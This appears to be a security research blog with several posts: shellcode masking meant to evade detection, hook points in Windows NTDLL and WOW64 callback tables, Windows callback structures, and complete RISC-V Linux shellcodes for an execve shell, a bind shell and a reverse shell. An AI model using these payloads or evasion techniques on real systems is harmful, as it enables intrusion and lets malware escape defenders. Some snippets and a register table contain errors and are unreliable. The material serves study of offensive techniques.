modexp

Shellcode: Data Masking 2

Posted on April 29, 2024 by odzhan

Introduction

This is a quick follow up post to Data Masking that discussed how one might use the Fisher-Yates shuffle and a DRBG to mask shellcode. There’s a lot of ways to mask data that don’t involve using an XOR operation but despite being relatively simple to implement are rarely used. You can use involutions, partial encryption, base encoding, simple arithmetic using addition and subtraction or modular variants. In the past, I’ve found components of block and stream ciphers to be a good source of techniques because the operations need to be invertible. In this post we’ll look at how easy it is to use byte substitution.

Substitution Box

Although substitution ciphers date back to ancient times, DES was first to use fixed s-box arrays for encrypting data. Since then, such non-linear operations have become a standard component of many block ciphers. To implement, we perform the following steps:

Initialize 256-byte array we call “s-box” using [0, 255]
Shuffle s-box using random seed.
Create inverse s-box.

This S-Box can then be used for masking data and the inverse can be used for unmasking. The reason we use a random seed to shuffle the s-box is so that the masked data is always different. Here’s a snippet of C code to demonstrate…

//
// simple byte substitution using fisher-yates shuffle and DRBG
//
typedef struct _mask_ctx {
    uint8_t sbox[256], sbox_inv[256];
} mask_ctx;

void
init_mask(mask_ctx *c) {
    uint8_t seed[ENCRYPT_KEY_LEN];
    
    // initialise sbox
    for (int i=0; i<256; i++) {
        c->sbox[i] = (uint8_t)i;
    }
    // initialise seed/key
    random(seed, ENCRYPT_KEY_LEN);

    // shuffle sbox using random seed.
    shuffle(seed, c->sbox, 256);

    // create inverse
    for (int i=0; i<256; i++) {
        c->sbox_inv[c->sbox[i]] = i;
    }
}

// mask buf
void
encode(mask_ctx *c, void *buf, size_t len) {
    uint8_t *x = (uint8_t*)buf;
    
    for (size_t i=0; i<len; i++) {
        x[i] = c->sbox[x[i]];
    }
}

// unmask buf
void
decode(mask_ctx *c, void *buf, size_t len) {
    uint8_t *x = (uint8_t*)buf;
    
    for (size_t i=0; i<len; i++) {
        x[i] = c->sbox_inv[x[i]];
    }
}

void
dump(const char *str, void *buf, size_t len) {
    uint8_t *x = (uint8_t*)buf;
    
    printf("\n%s:\n", str);
    
    for (size_t i=0; i<len; i++) {
        printf(" %02X", x[i]);
    }
}

int
main(int argc, char *argv[]) {
    mask_ctx c;
    uint8_t buf[32];
    
    // using random bytes here for testing..
    random(buf, sizeof(buf));
    
    init_mask(&c);
    dump("raw", buf, sizeof(buf));
    
    encode(&c, buf, sizeof(buf));
    dump("encoded", buf, sizeof(buf));
    
    decode(&c, buf, sizeof(buf));
    dump("decoded", buf, sizeof(buf));
    
    return 0;
}

And here’s the output of the program.

You can simplify the above example by just using the srand(), rand() functions and a modulo operator instead of a DRBG. See the full example here.

Since it’s a bit more complicated than it needs to be. What we can do is repurpose the key initialization of RC4 and derive an inverse lookup table from that. Here’s a little more code to demonstrate.

typedef struct _mask_ctx {
    uint8_t sbox[256];
    uint8_t key[16];
    uint8_t sbox_inv[256];
} mask_ctx;

// initialise using RC4
void
init_mask(mask_ctx *c) {
    // initialise sbox
    for (size_t i=0; i<256; i++) {
        c->sbox[i] = (uint8_t)i;
    }
    // shuffle sbox
    for (size_t i=0, j=0; i<256; i++) {
        j = (j + (c->sbox[i] + c->key[i % 16])) & 255;
        uint8_t t = c->sbox[i] & 255;
        c->sbox[i] = c->sbox[j];
        c->sbox[j] = t;
    }
    // create inverse
    for (size_t i=0; i<256; i++) {
        c->sbox_inv[c->sbox[i]] = i;
    }
}

// mask or unmask
void
mask(uint8_t *sbox, size_t len, void *buf) {
    uint8_t *in = (uint8_t*)buf;
    uint8_t *out = (uint8_t*)buf;
    
    for (size_t i=0; i<len; i++) {
        out[i] = sbox[in[i]];
    }
}

In this case, mask() performs both encoding and decoding depending on the sbox array passed to it. And just for fun the 32-bit assembly code…

;
; Simple obfuscation using byte substitution.
;
    
    bits 32
    
%ifndef BIN
    global _init_mask_x86
    global init_mask_x86
    
    global _mask_x86
    global mask_x86
%endif

    section .text
    
    ;
    ; void init_mask_x86(mask_ctx*c);
    ;
_init_mask_x86:
init_mask_x86:
    pushad
    mov    edi, [esp+32+4]
    push   edi
    pop    esi
    xor    eax, eax          ; i=0
initialise_sbox:
    stosb                    ; c->sbox[i]=i
    inc    al                ; i++
    jnz    initialise_sbox   ; i<256
    cdq                      ; j=0
shuffle_sbox:
    ; j = (j + (c->sbox[i] + c->key[i % 16])) & 255;
    movzx  ecx, al           ; t = i % 16
    and    cl, 15            ;
    
    add    dl, [edi+ecx]     ; j += c->key[i % 16]
    mov    cl, [esi+eax]     ; t = c->sbox[i]
    add    dl, cl            ; j += c->sbox[i]
    xchg   cl, [esi+edx]     ; swap(t, s[j])
    mov    [esi+eax], cl
    
    inc    al                ; i++
    jnz    shuffle_sbox      ; i<256
    add    edi, 16
create_inverse:
    mov    dl, [esi+eax]     ; sbox_inv[sbox[i]] = i
    mov    [edi+edx], al     ; 
    inc    al
    jnz    create_inverse
    
    popad
    ret
    
    ;
    ; void mask_x86(void *sbox, size_t inlen, void *inbuf);
    ;
mask_x86:
_mask_x86:
    pushad
    lea    esi, [esp+32+4]
    lodsd
    xchg   ebx, eax          ; bx = sbox
    lodsd
    xchg   ecx, eax          ; cx = inlen
    lodsd
    xchg   esi, eax          ; si = inbuf
    push   esi
    pop    edi
mask_loop:
    lodsb                    ; al = in[i]
    xlatb                    ; al = sbox[al]
    stosb                    ; out[i] = al
    loop   mask_loop
    popad
    ret

Summary

There’s lots of ways to obfuscate data. Most people will use an XOR but this is a safe indicator of obfuscation and a way to detect it. Using byte substitution only requires a byte-to-byte mapping and probably harder to detect.

Posted in Uncategorized | Leave a comment

Delegated NT DLL

Posted on February 13, 2024 by odzhan

Introduction

redplait and Adam/Hexacorn already documented this in 2017 and 2018 respectively, so it’s not a new discovery. Officially available since RedStone 2 released in April 2017, redplait states it was introduced with insider build 15007 released in January 2017. It has similarities with the WOW64 function table present in AMD64 versions of NTDLL.

References

Observations

Using IDA Pro or Ghidra with support for debugging symbols enabled, the table can be found at ntdll!_LdrpDelegatedNtdllExports

The DLL itself would be found in one of the following paths.

Arch	Path
x86	C:\Windows\System32\
AMD64	C:\Windows\SysWOW64\
ARM64	C:\Windows\SysWOW64\

Table

The table containing function pointers on my system appears in the .text section which indicates the DLL was compiled with .rdata and .text merged. Therefore the PoC to locate the table may or may not work for you unless you change the section to .rdata. Safe to assume it’s in read-only memory on some systems but I haven’t checked. It contains the addresses of at least thirteen function pointers located in the .data section. There may be more or less depending on the build.

The interesting thing is that, like the WOW64 table, the NT delegate table provides a simple way to intercept a variety of callbacks in 32-bit mode without the need to overwrite code with inline hooking. Most tools designed to detect malicious hooks look at executable code rather than changes to function pointers that normally reside in read-only or read-write memory.

PoC to find table

Posted in data structures, security, windows | Tagged amd64, ARM64, hacking, internals, shellcode, structures, windows, x64, x86 | Leave a comment

WOW64 Callback Table (FinFisher)

Posted on April 19, 2023 by odzhan

Introduction

Ken Johnson (otherwise known as Skywing) first talked about the KiUserExceptionDispatcher back in 2007 . Since then, scattered around the internet are various posts talking about it, but for some reason nobody demonstrating how to use it. It’s been documented that FinFisher misuses the function pointers as part of its virtual machine functionality, so let’s take a look at how to find the table before doing anything creative with it…The code to locate the table didn’t take long and didn’t require looking at FinFisher internals or existing code. It’s a simple heuristic based search.

References

Observations

If you take a look at ntdll!LdrpLoadWow64, that’s called during initialization of a WOW64 process, you’ll see it loading wow64.dll and resolving the address of six exports. This process has been better documented in the posts mentioned above.

Wow64LdrpInitialize
Wow64PrepareForException
Wow64ApcRoutine
Wow64PrepareForDebuggerAttach
Wow64SuspendLocalThread
Wow64SuspendLocalProcess

A closer look at how this works will provide you with an array of function names stored in STRING format and a pointer to a variable that holds each address resolved. The following is my attempt at recreating the same structure.

typedef union _W64_T {
    LPVOID p;
    DWORD64 q;
    LPVOID *pp;
} W64_T;
    
typedef struct _WOW64_CALLBACK {
    STRING Name;
    W64_T  Function;
} WOW64_CALLBACK, *PWOW64_CALLBACK;

//
// Structure based on 64-bit version of NTDLL on Windows 10
//
typedef struct _WOW64_CALLBACK_TABLE {
    WOW64_CALLBACK  Wow64LdrpInitialize;
    WOW64_CALLBACK  Wow64PrepareForException;
    WOW64_CALLBACK  Wow64ApcRoutine;
    WOW64_CALLBACK  Wow64PrepareForDebuggerAttach;
    WOW64_CALLBACK  Wow64SuspendLocalThread;
    WOW64_CALLBACK  Wow64SuspendLocalProcess;
} WOW64_CALLBACK_TABLE, *PWOW64_CALLBACK_TABLE;

WOW64_CALLBACK_TABLE Wow64Table = {
    {RTL_CONSTANT_STRING("Wow64LdrpInitialize"), NULL},
    {RTL_CONSTANT_STRING("Wow64PrepareForException"), NULL},
    {RTL_CONSTANT_STRING("Wow64ApcRoutine"), NULL},
    {RTL_CONSTANT_STRING("Wow64PrepareForDebuggerAttach"), NULL},
    {RTL_CONSTANT_STRING("Wow64SuspendLocalThread"), NULL},
    {RTL_CONSTANT_STRING("Wow64SuspendLocalProcess"), NULL}
    };

Locating Table

There could be a number of ways to do this. In the following example, we search the .rdata section for STRING structures that equal the function pointer we wish to find. Since these strings are constant and unlikely to change, it works reasonably well.

BOOL 
IsReadOnlyPtr(LPVOID ptr) {
    MEMORY_BASIC_INFORMATION mbi;
    
    if (!ptr) return FALSE;
    
    DWORD res = VirtualQuery(ptr, &mbi, sizeof(mbi));
    if (res != sizeof(mbi)) return FALSE;

    return ((mbi.State   == MEM_COMMIT    ) &&
            (mbi.Type    == MEM_IMAGE     ) && 
            (mbi.Protect == PAGE_READONLY));
}

BOOL
GetWow64FunctionPointer(PWOW64_CALLBACK Callback) {
    auto m = (PBYTE)GetModuleHandleW(L"ntdll");
    auto nt = (PIMAGE_NT_HEADERS)(m + ((PIMAGE_DOS_HEADER)m)->e_lfanew);
    auto sh = IMAGE_FIRST_SECTION(nt);
    
    for (DWORD i=0; i<nt->FileHeader.NumberOfSections; i++) {
        if (*(PDWORD)sh[i].Name == *(PDWORD)".rdata") {
            auto rva = sh[i].VirtualAddress;
            auto cnt = (sh[i].Misc.VirtualSize - sizeof(STRING)) / sizeof(ULONG_PTR);
            auto ptr = (PULONG_PTR)(m + rva);
            
            for (DWORD j=0; j<cnt; j++) {
                if (!IsReadOnlyPtr((LPVOID)ptr[j])) continue;
                
                auto api = (PSTRING)ptr[j];

                if (api->Length == Callback->Name.Length && 
                    api->MaximumLength == Callback->Name.MaximumLength) 
                {
                    if (!strncmp(api->Buffer, Callback->Name.Buffer, Callback->Name.Length)) {
                        Callback->Function.p = (PVOID)ptr[j + 1];
                        return TRUE;
                    }
                }
            }
            break;
        }
    }
    return FALSE;
}

void
GetWow64CallbackTable(PWOW64_CALLBACK_TABLE Table) {
    GetWow64FunctionPointer(&Table->Wow64LdrpInitialize);
    GetWow64FunctionPointer(&Table->Wow64PrepareForException);
    GetWow64FunctionPointer(&Table->Wow64ApcRoutine);
    GetWow64FunctionPointer(&Table->Wow64PrepareForDebuggerAttach);
    GetWow64FunctionPointer(&Table->Wow64SuspendLocalThread);
    GetWow64FunctionPointer(&Table->Wow64SuspendLocalProcess);
}

Summary

This type of code isn’t useful to a 32-Bit WOW process without jumping to 64-Bit since the function pointers are stored in the 64-Bit version of NTDLL. There are potentially other uses though like intercepting APCs, anti-debugging and processing exceptions before VEH or SEH, which FinFisher did successfully for many many years….

PoC here

Posted in assembly, data structures, programming, security, windows | Tagged windows, x64, x86 | 1 Comment

Shellcode: Data Masking

Posted on July 31, 2022 by odzhan

Introduction

There are more than four ways to mask data, but these are the main ones to focus on in this post.

Lossless Compression
Encryption
Steganography
Shuffling

If we want to detect a compressed or encrypted stream of bytes but can’t rely on a file header for a signature, the best way is by using something like a Chi-Square test. The more uniform the data is, the more likely it is to be compressed or encrypted.

Steganography is better at masking. Some image formats already use lossless compression to reduce the size of files. The PNG format, for example, uses Zlib, and the high compression ratio will result in the file having a high amount of entropy. The GIF format uses LZW as its compression method. TIFF also uses LZW by default while WEBP uses Brotli compression.

Involutions

In mathematics, an involution, or an involutory function, is a function that is its own inverse; For the following instructions, I’m merely using this word to describe what they do in practice. Executed once will mask data, and executing again will unmask. These are very common but also very weak when used alone.

1) eXclusive-OR bitwise operation
    xor   eax, -1

2) Bitwise NOT
    not   eax
    xor   eax, -1

3) Bitwise Negation
    neg   eax
    imul  eax, -1
    
4) Circular Shift
    shrd  eax, eax, 16
    ror   eax, 16
    rol   eax, 16
    ror   al, 4
  
5) Byte Swapping
    bswap eax
    xchg  al, ah

The circular shift and byte swapping operations are much closer to a permutation. They could also be used on large arrays in addition to the shuffling.

Random Shuffling

Let’s imagine you want to shuffle a deck of cards for an online poker game. The shuffling algorithm must be unbiased, and the results can’t be predictable before a game begins. Many who have asked for such an algorithm know of the Fisher-Yates shuffle. It’s an algorithm for generating a random permutation of a finite sequence. It was proposed by Ronald Fisher and Frank Yates in their book Statistical Tables for Biological, Agricultural and Medical Research published in 1939. Richard Durstenfeld modified the algorithm in 1964, and Donald E. Knuth popularised it in his 1968 book The Art of Computer Programming, hence why some refer to it as the Knuth Shuffle.

The following code in C illustrates how one might shuffle a byte array. Here, we’re using the current time as a seed to initialise the PRNG, which wouldn’t be recommended for a poker game. 😀

void
fisher_yates_shuffle(void *inbuf, size_t inlen) {
    uint8_t *in = (uint8_t*)inbuf;
    uint8_t t;
    
    srand(time(0));
    
    for (size_t i = inlen - 1; i > 0; i--) {
        uint32_t j = rand() % (i + 1);
        uint8_t = in[i];
        in[i] = in[j];
        in[j] = t;
    }
}

Obtaining a unique sequence of numbers to shuffle the array is problematic. Most software will use a pseudorandom number generator (PRNG). However, knowing how to generate the same sequence of numbers used to shuffle a deck of cards allows us to determine where every card is and even reverse the process. But that’s precisely what makes Fisher-Yates useful for masking. We want to unshuffle our masked data later; it’s just that rand() isn’t suitable. We need something else.

Keyed/Seeded/Deterministic Shuffling

Apart from rand() being weak for shuffling, unshuffling the array would require starting with the last number returned by it. rand() doesn’t support this type of random access, therefore our unshuffling algorithm would be required to generate the exact same sequence of numbers and store each one in memory before starting to unshuffle. We need a function that can produce deterministic values based on a seed or key. Seeded or keyed shuffling and unshuffling is really what we need.

A PRNG is also a Deterministic Random Bit Generator (DRBG). The DRBG/PRNG-generated sequence is not truly random because an initial value, called the PRNG’s seed (which may include truly random values), entirely determines the output bits generated by it. Therefore, we can replace rand() with a stream cipher like RC4, ChaCha, or a block cipher like AES in Counter (CTR) mode and generate deterministic values.

NIST has defined how to construct a DRBG from CTR mode in SP 800-90Ar1, but it’s unnecessary to use this for masking. Rather than implement a DRBG, we just need to encrypt the range index using a secret key and then derive an unbiased number within that range from the ciphertext. The following code tries to demonstrate how it might be done in practice.

#if defined(_WIN64)
//
// SPECK128-256
//
#define WORDLEN 64
#define PRNG_MAX_INT (INT64_MAX + 1)
#define ENCRYPT_KEY_LEN 32
#define ENCRYPT_BLOCK_LEN 16
#define R(v,n)(((v)>>(n))|((v)<<(64-(n))))
typedef unsigned long long W;

void 
encrypt(void*mk,void*p){
    W k[4],*x=(W*)p,i,t;

    for (i=0; i<4; i++) k[i] = ((W*)mk)[i];

    for (i=0; i<34; i++) {
        x[1] = (R(x[1], 8) + x[0]) ^ k[0],
        x[0] = R(x[0], 61) ^ x[1],
        k[1] = (R(k[1], 8) + k[0]) ^ i,
        k[0] = R(k[0], 61) ^ k[1];
        t = k[1], k[1] = k[2], k[2] = k[3], k[3] = t;
    }
}

#else
//
// SPECK64-128
//
#define WORDLEN 32
#define PRNG_MAX_INT (INT32_MAX + 1)
#define ENCRYPT_KEY_LEN 16
#define ENCRYPT_BLOCK_LEN 8
#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
typedef unsigned int W;

void 
encrypt(void* mk, void* p) {
    W k[4],*x=(W*)p,i,t;

    for (i=0; i<4; i++) k[i] = ((W*)mk)[i];

    for (i=0; i<27; i++) {
        x[0] = (R(x[0], 8) + x[1]) ^ k[0],
        x[1] = R(x[1], 29) ^ x[0],
        t = k[3],
        k[3] = (R(k[1], 8) + k[0]) ^ i,
        k[0] = R(k[0], 29) ^ k[3],
        k[1] = k[2], k[2]=t;
    }
}
#endif

W
prng_word(void *key, W max) {
    W r, x[2], ctr = 1, d = ((-max) / max) + 1;
    if (d == 0) return 0;
    
    for (;;) {
        x[0] = max;
        x[1] = ctr++;
        
        encrypt(key, x);
        
        r = x[0] / d;
        if (r < max) return r;
    }
}

void
shuffle(void *seed, void *inbuf, size_t inlen) {
    uint8_t *in = (uint8_t*)inbuf;
    
    for (size_t i = inlen - 1; i > 0; i--) {
        uint32_t j = prng_word(seed, (i + 1));
        uint8_t t = in[i];
        in[i] = in[j];
        in[j] = t;
    }
}

void
unshuffle(void *seed, void *inbuf, size_t inlen) {
    uint8_t *in = (uint8_t*)inbuf;
    
    for (size_t i = 0; i < inlen; i++) {
        uint32_t j = prng_word(seed, (i + 1));
        uint8_t t = in[i];
        in[i] = in[j];
        in[j] = t;
    }
}

There are times when elements of the array will remain in the same position after shuffling. This typically happens with small arrays. In that case, something else is required for masking. Now, if you know of a way to fix that, feel free to leave a comment or drop me an email.

Summary

Shuffling doesn’t provide any confidentiality for the masked data like encryption does and doesn’t reduce its size like compression does. However, shuffling a large enough array using a secure cipher and secret key to generate a sequence of numbers can probably make it difficult to recover the original data without the key used to initialise the PRNG. That seems helpful in masking data and better than an XOR. But of course, something like this is in no way intended or implied to be a suitable replacement for encryption and shouldn’t be used for any critical information!

References

Posted in assembly, compression, cryptography, encryption, programming, security, shellcode | Tagged fisher-yates, shuffling | 3 Comments

Shellcode: Linux on RISC-V 64-Bit

Posted on May 2, 2022 by odzhan

RISC-V (pronounced “risk-five” ) is an open standard instruction set architecture (ISA) based on established reduced instruction set computer (RISC) principles. Unlike most other ISA designs, RISC-V is provided under open source licenses that do not require fees to use.

To learn more about the RISC-V architecture, I recently bought a StarFive VisionFive Single Board computer. It’s slightly more expensive than the RPI that runs on ARM, but it’s the closest thing to an RPI we have available right now. It uses the SiFive’s U74 64-bit RISC-V processor core which is similar to the ARM Cortex-A55. Readers without access to a board like this have the option of using QEMU.

You can view the shellcodes here.

The RISC-V ISA (excluding extensions) is of course much smaller than the ARM ISA, but that also makes it easier to learn IMHO. The reduced set of instructions is more suitable for beginners learning their first assembly language. From a business perspective, and I accept I’m not an expert on such issues, the main advantages of RISC-V over ARM is that it’s open source, has no licensing fees and is sanction-free. For those reasons, it may very well become more popular than ARM in future. We’ll have to wait and see.

	X86 (AMD64)	ARM64	RISC-V 64
Registers	RAX-R15	X0-X31	A0-A31
Syscall Register	RAX	X8	A7
Return Register	RAX	X0	A0
Zero Register	N/A	XMR	X0
Relative Addressing	LEA	ADR	LA
Data Transfer (Register)	MOV	MOV	MV
Data Transfer (Immediate)	MOV	MOV	LI
Execute System Call	SYSCALL	SVC	ECALL

Execute /bin/sh

    # 48 bytes
 
    .include "include.inc"

    .global _start
    .text

_start:
    # execve("/bin/sh", NULL, NULL);
    li     a7, SYS_execve
    mv     a2, x0           # NULL
    mv     a1, x0           # NULL
    li     a3, BINSH        # "/bin/sh"
    sd     a3, (sp)         # stores string on stack
    mv     a0, sp
    ecall

Execute Command

    # 112 bytes

    .include "include.inc"
    
    .global _start
    .text

_start:
    # execve("/bin/sh", {"/bin/sh", "-c", cmd, NULL}, NULL);
    addi   sp, sp, -64           # allocate 64 bytes of stack
    li     a7, SYS_execve
    li     a0, BINSH             # a0 = "/bin/sh\0"
    sd     a0, (sp)              # store "/bin/sh" on the stack
    mv     a0, sp
    li     a1, 0x632D            # a1 = "-c"
    sd     a1, 8(sp)             # store "-c" on the stack
    addi   a1, sp, 8
    la     a2, cmd               # a2 = cmd
    sd     a0, 16(sp)
    sd     a1, 24(sp)
    sd     a2, 32(sp)
    sd     x0, 40(sp)
    addi   a1, sp, 16            # a1 = {"/bin/sh", "-c", cmd, NULL}
    mv     a2, x0                # penv = NULL
    ecall 
cmd:
    .asciz "echo Hello, World!"

Bind Shell

    # 176 bytes
 
    .include "include.inc"

    .equ PORT, 1234

    .global _start
    .text

_start:
    addi   sp, sp, -16
    
    # s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    li     a7, SYS_socket
    li     a2, IPPROTO_IP
    li     a1, SOCK_STREAM
    li     a0, AF_INET
    ecall
    
    mv     a3, a0
    
    # bind(s, &sa, sizeof(sa));  
    li     a7, SYS_bind
    li     a2, 16
    li     a1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET) 
    sd     a1, (sp)
    sd     x0, 8(sp)
    mv    a1, sp
    ecall
  
    # listen(s, 1);
    li     a7, SYS_listen
    li     a1, 1
    mv     a0, a3
    ecall
    
    # r = accept(s, 0, 0);
    li     a7, SYS_accept
    mv     a2, x0
    mv     a1, x0
    mv     a0, a3
    ecall
    
    mv     a4, a0
 
    # in this order
    #
    # dup3(s, STDERR_FILENO, 0);
    # dup3(s, STDOUT_FILENO, 0);
    # dup3(s, STDIN_FILENO,  0);
    li     a7, SYS_dup3
    li     a1, STDERR_FILENO + 1
c_dup:
    mv     a0, a4
    addi   a1, a1, -1
    ecall
    bne    a1, zero, c_dup

    # execve("/bin/sh", NULL, NULL);
    li     a7, SYS_execve
    mv     a2, x0
    mv     a1, x0
    li     a0, BINSH
    sd     a0, (sp)
    mv     a0, sp
    ecall

Reverse Connect Shell

    # 140 bytes

    .include "include.inc"

    .equ PORT, 1234
    .equ HOST, 0x0100007F # 127.0.0.1

    .global _start
    .text

_start:
    addi    sp, sp, -16
    
    # s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    li      a7, SYS_socket
    li      a2, IPPROTO_IP
    li      a1, SOCK_STREAM
    li      a0, AF_INET
    ecall
    
    mv      a3, a0       # a3 = s
    
    # connect(s, &sa, sizeof(sa));
    li      a7, SYS_connect
    li      a2, 16
    li      a1, ((HOST << 32) | ((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    sd      a1, (sp)
    mv      a1, sp       # a1 = &sa 
    ecall
  
    # in this order
    #
    # dup3(s, STDERR_FILENO, 0);
    # dup3(s, STDOUT_FILENO, 0);
    # dup3(s, STDIN_FILENO,  0);
    li      a7, SYS_dup3
    li      a1, STDERR_FILENO + 1
c_dup:
    mv      a2, x0
    mv      a0, a3
    addi    a1, a1, -1
    ecall
    bne     a1, zero, c_dup

    # execve("/bin/sh", NULL, NULL);
    li      a7, SYS_execve
    li      a0, BINSH
    sd      a0, (sp)
    mv      a0, sp
    ecall

Windows Data Structures and Callbacks, Part 1

Posted on August 6, 2020 by odzhan

Windows Data Structures and Callbacks, Part 1

Introduction
Function Table List
Event Tracing
DLL Notifications
Secure Memory
Configuration Manager (CM)
Vectored Exception Handling (VEH)
Windows Error Reporting (WER)

1. Introduction

A process can contain thousands of pointers to executable code, some of which are stored in opaque, but writeable data structures only known to Microsoft, a handful of third party vendors and of course bad guys that want to hide malicious code from memory scanners. This post documents what some of the data structures contain rather than PoCs to demonstrate code redirection or evasion, which I probably won’t discuss much anymore. The names of some structure fields won’t be entirely accurate, but feel free to drop me an email if you think something needs correcting. No, I don’t have access to source code. These structures were reverse engineered or can be found on MSDN.

2. Dynamic Function Table List

ntdll!RtlpDynamicFunctionTable contains DYNAMIC_FUNCTION_TABLE entries and callback functions for a range of memory that can be installed using ntdll!RtlInstallFunctionTableCallback. ntdll!RtlGetFunctionTableListHead returns a pointer to the list and since NTDLL.dll uses the same base address for each process, you can read entries from a remote process very easily.

typedef enum _FUNCTION_TABLE_TYPE {
    RF_SORTED,
    RF_UNSORTED,
    RF_CALLBACK
} FUNCTION_TABLE_TYPE;

typedef PRUNTIME_FUNCTION (CALLBACK *PGET_RUNTIME_FUNCTION_CALLBACK)
  (ULONG_PTR ControlPc, PVOID Context);
    
typedef struct _DYNAMIC_FUNCTION_TABLE {
    LIST_ENTRY                      Links;
    DWORD64                         TableIdentifier;
    LARGE_INTEGER                   TimeStamp;
    DWORD64                         MinimumAddress;
    DWORD64                         MaximumAddress;
    PVOID                           BaseAddress;
    PGET_RUNTIME_FUNCTION_CALLBACK  Callback;
    PCWSTR                          OutOfProcessCallbackDll;
    FUNCTION_TABLE_TYPE             Type;
    ULONG                           EntryCount;
    ULONG64                         UnknownStruct[3];  // referenced by RtlAvlInsertNodeEx         
} DYNAMIC_FUNCTION_TABLE, *PDYNAMIC_FUNCTION_TABLE;

3. Event Tracing

Microsoft recommends against using it, but sechost!SetTraceCallback can still receive ETW events. Entries of type EVENT_CALLBACK_ENTRY are located at sechost!EtwpEventCallbackList.

typedef VOID (CALLBACK PEVENT_CALLBACK)(PEVENT_TRACE pEvent);

ULONG WMIAPI SetTraceCallback(
    LPCGUID         pGuid,
    PEVENT_CALLBACK EventCallback);

typedef struct _EVENT_CALLBACK_ENTRY {
    LIST_ENTRY      ListHead;
    GUID            ProviderId;
    PEVENT_CALLBACK Callback;
} EVENT_CALLBACK_ENTRY, *PEVENT_CALLBACK_ENTRY;

4. DLL Notifications

It’s possible to receive notifications about a DLL being loaded or unloaded using ntdll!LdrRegisterDllNotification. It’s used to hook API for Common Language Runtime (CLR) in ClrGuard. Entries of type LDR_DLL_NOTIFICATION_ENTRY can be located at ntdll!LdrpDllNotificationList.

typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
    ULONG           Flags;             // Reserved.
    PUNICODE_STRING FullDllName;       // The full path name of the DLL module.
    PUNICODE_STRING BaseDllName;       // The base file name of the DLL module.
    PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
    ULONG           SizeOfImage;       // The size of the DLL image, in bytes.
} LDR_DLL_LOADED_NOTIFICATION_DATA, *PLDR_DLL_LOADED_NOTIFICATION_DATA;

typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {
    ULONG           Flags;             // Reserved.
    PUNICODE_STRING FullDllName;       // The full path name of the DLL module.
    PUNICODE_STRING BaseDllName;       // The base file name of the DLL module.
    PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
    ULONG           SizeOfImage;       // The size of the DLL image, in bytes.
} LDR_DLL_UNLOADED_NOTIFICATION_DATA, *PLDR_DLL_UNLOADED_NOTIFICATION_DATA;

typedef VOID (CALLBACK *PLDR_DLL_NOTIFICATION_FUNCTION)(
    ULONG                       NotificationReason,
    PLDR_DLL_NOTIFICATION_DATA  NotificationData,
    PVOID                       Context);
    
typedef union _LDR_DLL_NOTIFICATION_DATA {
    LDR_DLL_LOADED_NOTIFICATION_DATA   Loaded;
    LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;
} LDR_DLL_NOTIFICATION_DATA, *PLDR_DLL_NOTIFICATION_DATA;

typedef struct _LDR_DLL_NOTIFICATION_ENTRY {
    LIST_ENTRY                     List;
    PLDR_DLL_NOTIFICATION_FUNCTION Callback;
    PVOID                          Context;
} LDR_DLL_NOTIFICATION_ENTRY, *PLDR_DLL_NOTIFICATION_ENTRY;

typedef NTSTATUS(NTAPI *_LdrRegisterDllNotification) (
    ULONG                          Flags,
    PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction,
    PVOID                          Context,
    PVOID                          *Cookie);
    
typedef NTSTATUS(NTAPI *_LdrUnregisterDllNotification)(PVOID Cookie);

5. Secure Memory

Kernel drivers can secure user-space memory using ntoskrnl!MmSecureVirtualMemory. This prevents the memory being freed or having its page protection made more restrictive. i.e PAGE_NOACCESS. To monitor changes, developers can install a callback using AddSecureMemoryCacheCallback. Entries of type RTL_SEC_MEM_ENTRY are located at ntdll!RtlpSecMemListHead.

typedef BOOLEAN (CALLBACK *PSECURE_MEMORY_CACHE_CALLBACK)(PVOID, SIZE_T);

typedef struct _RTL_SEC_MEM_ENTRY {
    LIST_ENTRY                    Links;
    ULONG                         Revision;
    ULONG                         Reserved;
    PSECURE_MEMORY_CACHE_CALLBACK Callback;
} RTL_SEC_MEM_ENTRY, *PRTL_SEC_MEM_ENTRY;

6. Configuration Manager (CM)

A process can register for Plug and Play events using cfgmgr32!CM_Register_Notification. Microsoft recommends legacy systems up to Windows 7 use RegisterDeviceNotification, but I didn’t examine that function. Notification entries of type _HCMNOTIFICATION are located at cfgmgr32!EventSystemClientList. _CM_CALLBACK_INFO is the structure sent to \Device\DeviceApi\CMNotify when a process registers a callback. As you can see from the WnfSubscription field, it uses the Windows Notification Facility (WNF) to receive events.

typedef DWORD (CALLBACK *PCM_NOTIFY_CALLBACK)(
    _In_     HCMNOTIFICATION       hNotify,
    _In_opt_ PVOID                 Context,
    _In_     CM_NOTIFY_ACTION      Action,
    _In_     PCM_NOTIFY_EVENT_DATA EventData,
    _In_     DWORD                 EventDataSize);
    
typedef struct _CM_CALLBACK_INFO {
    WCHAR              ModulePath[MAX_PATH];
    CM_NOTIFY_FILTER   EventFilter;
};

typedef struct _tagHCMNOTIFICATION {
    USHORT                  Signature;             // 0xF097
    SRWLOCK                 SharedLock;
    CONDITION_VARIABLE      ConditionVar;
    LIST_ENTRY              EventSystemClientList;
    LIST_ENTRY              EventSystemPendingClients;
    BOOL                    Active;
    BOOL                    InProgress;
    CM_NOTIFY_FILTER        EventFilter;
    PCM_NOTIFY_CALLBACK     Callback;
    PVOID                   Context;
    HANDLE                  NotifyFile;    // handle for \Device\DeviceApi\CMNotify
    PWNF_USER_SUBSCRIPTION  WnfSubscription;
    LIST_ENTRY              Links;
} _HCMNOTIFICATION, *_PHCMNOTIFICATION;

7. Vectored Exception Handling (VEH)

When kernelbase!KernelBaseBaseDllInitialize is executed, it installs an exception handler kernelbase!UnhandledExceptionFilter via SetUnhandledExceptionFilter. Unless a Vectored Exception Handler (VEH) is installed afterwards, this is the top level handler executed for any faults that occur. VEH callbacks installed using AddVectoredExceptionHandler or AddVectoredContinueHandler are located at ntdll!LdrpVectorHandlerList

// vectored handler list
typedef struct _RTL_VECTORED_HANDLER_LIST {
    SRWLOCK                    Lock;
    LIST_ENTRY                  List;
